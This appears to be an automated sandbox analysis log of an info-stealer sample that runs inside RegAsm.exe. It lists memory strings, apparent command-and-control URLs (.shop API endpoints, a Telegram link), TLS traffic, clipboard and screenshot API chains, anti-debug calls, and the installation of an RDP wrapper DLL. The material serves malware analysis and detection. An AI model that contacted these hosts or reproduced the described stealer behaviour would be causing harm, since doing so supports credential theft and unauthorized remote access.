Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2828108079.000000001984D000.00000004.00000020.00020000.00000000.sdmp, DAAFII.11.dr, GIEHJK.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: DAAFII.11.dr, GIEHJK.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2828108079.000000001984D000.00000004.00000020.00020000.00000000.sdmp, DAAFII.11.dr, GIEHJK.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: DAAFII.11.dr, GIEHJK.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vozmeatillu.shop:443/api
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wallkedsleeoi.shop/api
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: IDHIEB.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: IDHIEB.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: EBFHJE.2.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/:
Source: EBFHJE.2.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/KKFHIDAAKF
Source: EBFHJE.2.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: EBFHJE.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: EBFHJE.2.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: EBFHJE.2.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.139:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49787 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

2_2_00411F55

System Summary

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: IDBAFHDGDG.exe.2.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 365056
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 365056
Source: GIIIIJDHJE.exe.2.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	2_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	2_2_6C10ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C14B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	2_2_6C14B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C14B8C0 rand_s,NtQueryVirtualMemory,	2_2_6C14B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C14B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	2_2_6C14B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	2_2_6C0EF280

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Windows\System32\rfxvmt.dll

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED0C40	0_2_00ED0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041C472	2_2_0041C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042D933	2_2_0042D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042D1C3	2_2_0042D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042D561	2_2_0042D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041950A	2_2_0041950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042DD1B	2_2_0042DD1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042CD2E	2_2_0042CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041B712	2_2_0041B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E35A0	2_2_6C0E35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C125C10	2_2_6C125C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C132C10	2_2_6C132C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C15AC00	2_2_6C15AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C15542B	2_2_6C15542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C15545C	2_2_6C15545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F5440	2_2_6C0F5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F6C80	2_2_6C0F6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1434A0	2_2_6C1434A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C14C4A0	2_2_6C14C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10D4D0	2_2_6C10D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F64C0	2_2_6C0F64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C126CF0	2_2_6C126CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0ED4E0	2_2_6C0ED4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10ED10	2_2_6C10ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C110512	2_2_6C110512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FFD00	2_2_6C0FFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C120DD0	2_2_6C120DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1485F0	2_2_6C1485F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C127E10	2_2_6C127E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C135600	2_2_6C135600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C149E30	2_2_6C149E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C109E50	2_2_6C109E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C123E50	2_2_6C123E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C104640	2_2_6C104640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C132E4E	2_2_6C132E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C156E63	2_2_6C156E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EC670	2_2_6C0EC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C105E90	2_2_6C105E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C14E680	2_2_6C14E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C144EA0	2_2_6C144EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1576E3	2_2_6C1576E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EBEF0	2_2_6C0EBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FFEF0	2_2_6C0FFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C127710	2_2_6C127710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F9F00	2_2_6C0F9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1377A0	2_2_6C1377A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C116FF0	2_2_6C116FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EDFE0	2_2_6C0EDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F7810	2_2_6C0F7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12B820	2_2_6C12B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C134820	2_2_6C134820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C108850	2_2_6C108850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10D850	2_2_6C10D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12F070	2_2_6C12F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1160A0	2_2_6C1160A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1550C7	2_2_6C1550C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10C0E0	2_2_6C10C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1258E0	2_2_6C1258E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10A940	2_2_6C10A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C13B970	2_2_6C13B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C15B170	2_2_6C15B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FD960	2_2_6C0FD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C125190	2_2_6C125190
